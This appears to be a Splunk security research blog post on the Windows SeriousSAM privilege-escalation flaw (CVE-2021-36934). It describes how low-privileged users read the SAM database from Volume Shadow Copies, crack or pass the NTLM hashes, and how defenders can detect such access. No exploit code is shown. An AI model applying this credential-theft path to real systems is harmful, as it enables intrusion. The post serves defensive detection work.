SeriousSAM or CVE-2021-36934 is a Privilege Escalation Vulnerability, which allows overly permissive Access Control Lists (ACLs) that provide low privileged users read access to privileged system files including the Security Accounts Manager (SAM) database. The SAM database stores users' encrypted passwords in a Windows system. According to the Microsoft advisory, this issue affects Windows 10 1809 and above as well as certain versions of Server 2019.
Exploitation of SeriousSAM
To abuse this misconfiguration, an attacker who has already obtained low privilege code execution on a vulnerable host simply needs to read and export system files from a Volume Shadow Copy. An example is shown below using PowerShell:
Proof of concepts written in C (by Security Researcher Kevin Beaumont) and re-implemented in Go (by Christian Mehlmauer) are publicly available.
The Impact of SeriousSAM
Using the recovered system files, an attacker will be able to obtain the list of local users and their corresponding NTLM hashes as shown below. These hashes can be cracked offline using tools like hashcat to obtain their clear text form, alternatively, they can also be used to authenticate to other hosts remotely using PassTheHash.
In the most limited scenario, exploitation would allow a low privileged user to escalate privileges on a vulnerable host and take control of it. This allows attackers to install programs, read, modify, or delete sensitive data, add or remove users, etc.
However, organizations that leverage the same local account with the same credentials across several endpoints in an enterprise network face a higher risk. Leveraging the cracked passwords or the hashes, attackers will be able authenticate to remote hosts over the network and obtain remote code execution on them.
SeriousSAM has been categorized as Important by Microsoft and is pending a CVSS score by NIST at the time of writing. It is certainly not as serious as other vulnerabilities reported in the last few months like PringtNightmare or ProxyLogon. However, given the right circumstances as exposed above, it could enable adversaries to achieve operational success faster during a breach. The Splunk Threat Research team recommends performing an assessment to better understand the impact of this vulnerability in corporate environments.
Detection Opportunities and Limitations
Given that successful exploitation for this flaw simply means reading files within a Volume Shadow Copy, there are some limitations on how to detect it.
Command Line Logging
Native process command line logging, as well as EDR tools, can be used to hunt for suspicious Paths referencing Volume Shadow Copies just like the PowerShell example above.
However, these types of detections can be easily bypassed with custom tools that avoid command line parameters and leverage direct API calls for file reads.
File System Auditing
Native File System auditing in Windows systems can be used to monitor user attempts to access objects like files and folders. This requires system administrators to create a System Access Control List (SACL) on the specific files or folders that want to be monitored. Under the right conditions, this can be a great way of detecting attempts to read the SAM database as shown below.
However, using SACLs to detect this attack also has some limitations. Based on our testing, the created SACLs will only apply to new Volume Shadow Copies. Existing Volume Shadow Copies will not be monitored, unfortunately. This forces detection teams to have to delete all previous VSC to successfully monitor for CVE-2021-36934 exploitation using this approach.
The following analytics were identified in Security Content related to Shadow Copies being modified or deleted. In addition, we also wrote two new detections specifically related to CVE-2021-36934.
Detect Copy of ShadowCopy with Script Block Logging
SAM Database File Access Attempt